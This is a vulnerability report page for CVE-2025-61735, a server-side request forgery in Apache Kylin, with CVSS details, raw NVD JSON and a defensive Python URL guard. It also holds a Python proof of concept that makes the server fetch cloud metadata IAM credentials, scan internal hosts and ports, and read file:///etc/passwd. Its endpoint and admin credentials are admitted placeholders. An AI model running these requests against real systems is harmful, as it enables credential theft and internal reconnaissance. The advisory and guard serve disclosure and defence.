Security Vulnerability Report
CVE-2025-61735 CVSS 7.3 HIGH

CVE-2025-61735

Published: 2025-10-02 10:15:40
Last Modified: 2025-11-04 22:16:37

Description

Server-Side Request Forgery (SSRF, CWE-918) vulnerability in Apache Kylin. This issue affects Apache Kylin from 4.0.0 through 5.0.2. Deployments are not exposed as long as Kylin's system and project admin access is well protected, i.e. the vulnerable functionality sits behind admin privileges. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Note: this vector was assigned by a secondary scoring source (the raw JSON below records it as "type": "Secondary", not the vendor's own score) and sets PR:N, which is at odds with the vendor description tying exploitation to Kylin system or project admin access. Treat 7.3 as an upper bound and rate the issue against who actually holds admin rights on the instance.

Configurations (Affected Products)

cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - VULNERABLE
Apache Kylin >= 4.0.0
Apache Kylin <= 5.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61735 - Apache Kylin SSRF PoC
# This PoC demonstrates the SSRF vulnerability in Apache Kylin (4.0.0 - 5.0.2).
# The vulnerability allows attackers to make the server send requests to
# arbitrary URLs.
#
# Caveats: the advisory ties exploitation to Kylin system/project admin access,
# so the requests need admin credentials (Kylin's REST API uses HTTP Basic
# auth; KYLIN_AUTH below is an assumed placeholder). The endpoint and JSON
# body are placeholders as well: adjust them to the specific vulnerable API.
import requests

# Target Apache Kylin server (7070 is Kylin's default port)
TARGET_URL = "http://target-kylin-host:7070"
# Assumed endpoint that fetches a caller-supplied URL; adjust to the vulnerable API
SSRF_ENDPOINT = "/kylin/api/diag/project/download"
# Assumed admin credentials; replace with a valid Kylin admin account
KYLIN_AUTH = ("ADMIN", "KYLIN")
TIMEOUT = 10


def send_ssrf(target_url, url, method="GET"):
    """Ask the Kylin server to fetch `url` on our behalf. Returns the Response,
    or None if the target could not be reached."""
    payload = {"url": url, "method": method}
    try:
        return requests.post(
            f"{target_url}{SSRF_ENDPOINT}",
            json=payload,
            headers={"Content-Type": "application/json"},
            auth=KYLIN_AUTH,
            timeout=TIMEOUT,
        )
    except requests.RequestException as exc:
        print(f"[-] Request to {target_url} failed: {exc}")
        return None


# Step 1: Attempt to access the cloud instance metadata service
# This can be used to extract cloud credentials
def exploit_ssrf_cloud_metadata(target_url):
    """
    Exploit SSRF to access the cloud metadata service.
    Example targets:
    - AWS:   http://169.254.169.254/latest/meta-data/
    - GCP:   http://metadata.google.internal/computeMetadata/v1/
    - Azure: http://169.254.169.254/metadata/instance
    """
    malicious_url = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    response = send_ssrf(target_url, malicious_url)
    if response is None:
        return None
    print(f"[+] Cloud Metadata Response ({response.status_code}): {response.text}")
    return response.text


# Step 2: Internal network port scanning via SSRF
def exploit_ssrf_port_scan(target_url):
    """
    Use SSRF to probe internal hosts and ports; differences in status code,
    response time or error text reveal whether a port is open.
    """
    internal_targets = [
        "http://127.0.0.1:7070",  # Kylin itself
        "http://127.0.0.1:8080",  # Common internal service
        "http://192.168.1.1",     # Internal gateway
        "http://10.0.0.1",        # Internal network
        "http://localhost:22",    # SSH service detection
    ]
    for internal_url in internal_targets:
        response = send_ssrf(target_url, internal_url)
        if response is not None:
            print(f"[+] Probing {internal_url} -> Status: {response.status_code}")


# Step 3: Read local files via the file:// scheme (only works if the server's
# HTTP client accepts non-http schemes)
def exploit_ssrf_file_read(target_url):
    """
    Attempt to read local files using the file:// scheme.
    """
    response = send_ssrf(target_url, "file:///etc/passwd")
    if response is None:
        return None
    print(f"[+] File Read Response ({response.status_code}): {response.text}")
    return response.text


if __name__ == "__main__":
    print(f"[*] Targeting Apache Kylin at: {TARGET_URL}")
    print("[*] Attempting SSRF exploitation...")
    exploit_ssrf_cloud_metadata(TARGET_URL)
    exploit_ssrf_port_scan(TARGET_URL)
    exploit_ssrf_file_read(TARGET_URL)
```
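The description above only says that the server can be made to request attacker-chosen URLs, and the PoC shows the usual destinations: the cloud metadata address, loopback, RFC 1918 hosts and file://. The guard below is an added example, not Kylin's code and not the fix shipped in 5.0.3: it is the outbound-URL check a server-side "fetch this URL" feature needs to refuse every one of those targets, including IPv4-mapped IPv6, decimal IP literals, credentials smuggled in the userinfo, and a DNS answer that mixes a public and an internal address. The stub resolver and its answers are constructed so the example runs offline; `check_outbound_url`, `UrlCheck` and the hostnames are my names, not a real API.

```python
import ipaddress
import socket
from dataclasses import dataclass, field
from typing import Callable, Iterable, List
from urllib.parse import urlsplit

# Resolver: hostname -> iterable of IP strings. The default asks the OS; the
# constructed stub further down lets the check run offline.
Resolver = Callable[[str], Iterable[str]]

ALLOWED_SCHEMES = {"http", "https"}
# Names that alias loopback/metadata services no matter what DNS says.
BLOCKED_HOSTNAMES = {"localhost", "metadata", "metadata.google.internal"}
# Ranges the ipaddress flags below do not treat as private: CGNAT shared space.
EXTRA_BLOCKED_NETS = [ipaddress.ip_network("100.64.0.0/10")]


@dataclass
class UrlCheck:
    ok: bool
    reason: str
    addresses: List[str] = field(default_factory=list)  # vetted IPs to pin the connection to


def system_resolver(host: str) -> List[str]:
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def _is_disallowed(ip) -> bool:
    # Unwrap IPv4 embedded in IPv6 (::ffff:a.b.c.d, 2002::/16) so IPv4 rules apply.
    if isinstance(ip, ipaddress.IPv6Address):
        inner = ip.ipv4_mapped
        if inner is None:
            inner = ip.sixtofour
        if inner is not None:
            ip = inner
    if any(ip in net for net in EXTRA_BLOCKED_NETS):
        return True
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_outbound_url(url: str, resolver: Resolver = system_resolver) -> UrlCheck:
    """Allow only http(s) URLs whose host resolves exclusively to public unicast
    addresses. Callers should connect to the returned addresses (sending the
    original name in the Host header) instead of resolving again; otherwise a
    rebinding DNS answer can pass this check and flip to 169.254.169.254 later."""
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:          # urlsplit lowercases the scheme
        return UrlCheck(False, f"scheme not allowed: {parts.scheme or '<none>'}")
    if parts.username is not None or parts.password is not None:
        return UrlCheck(False, "userinfo in URL not allowed")
    host = parts.hostname                             # lowercased, IPv6 brackets stripped
    if not host:
        return UrlCheck(False, "missing host")
    if host.rstrip(".") in BLOCKED_HOSTNAMES:
        return UrlCheck(False, f"blocked hostname: {host}")
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP: never consult DNS
    except ValueError:
        try:
            resolved = list(resolver(host))
        except OSError as exc:                        # socket.gaierror is an OSError
            return UrlCheck(False, f"resolution failed: {exc}")
        if not resolved:
            return UrlCheck(False, "host did not resolve")
        addrs = [ipaddress.ip_address(a) for a in resolved]
    for addr in addrs:                                # every answer must be public
        if _is_disallowed(addr):
            return UrlCheck(False, f"{host} -> {addr} is not a public address")
    return UrlCheck(True, "ok", [str(a) for a in addrs])


# Constructed stub resolver (assumed answers, not real DNS) so the demo is offline.
STUB_DNS = {
    "example.com": ["93.184.216.34"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],  # mixed answer with one internal address
    "2130706433": ["127.0.0.1"],                       # decimal literal the OS resolver maps to loopback
}


def stub_resolver(host: str) -> List[str]:
    if host in STUB_DNS:
        return STUB_DNS[host]
    raise socket.gaierror(f"constructed stub: no answer for {host}")


def demo() -> List[str]:
    """Run the guard over the targets the PoC probes plus a few bypass shapes."""
    urls = [
        "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "http://[::ffff:169.254.169.254]/latest/meta-data/",
        "http://127.0.0.1:7070/kylin/api/",
        "http://localhost:22/",
        "http://192.168.1.1/",
        "http://2130706433/",
        "file:///etc/passwd",
        "http://admin:secret@example.com/",
        "http://rebind.example/",
        "https://example.com/",
    ]
    return [f"{u} -> {check_outbound_url(u, stub_resolver).reason}" for u in urls]


if __name__ == "__main__":
    print("\n".join(demo()))
```

Only the last URL in `demo()` passes. The list-of-addresses return value is the important design choice: a guard that validates and then lets the HTTP client resolve the name a second time is only a speed bump, so the caller should open the socket to a vetted address and redo this check on every redirect hop.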

References

https://lists.apache.org/thread/yscobmx869zvprsykb94r24jtmb58ckh (Issue Tracking, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/09/30/9

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-61735",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-02T10:15:40.250",
    "lastModified": "2025-11-04T22:16:37.160",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Server-Side Request Forgery (SSRF) vulnerability in Apache Kylin.\n\nThis issue affects Apache Kylin: from 4.0.0 through 5.0.2. You are fine as long as the Kylin's system and project admin access is well protected.\n\nUsers are recommended to upgrade to version 5.0.3, which fixes the issue."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "4.0.0",
                "versionEndExcluding": "5.0.3",
                "matchCriteriaId": "0732C89B-68F0-406A-977F-C75F554B17DD"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://lists.apache.org/thread/yscobmx869zvprsykb94r24jtmb58ckh",
        "source": "[email protected]",
        "tags": [
          "Issue Tracking",
          "Vendor Advisory"
        ]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/09/30/9",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}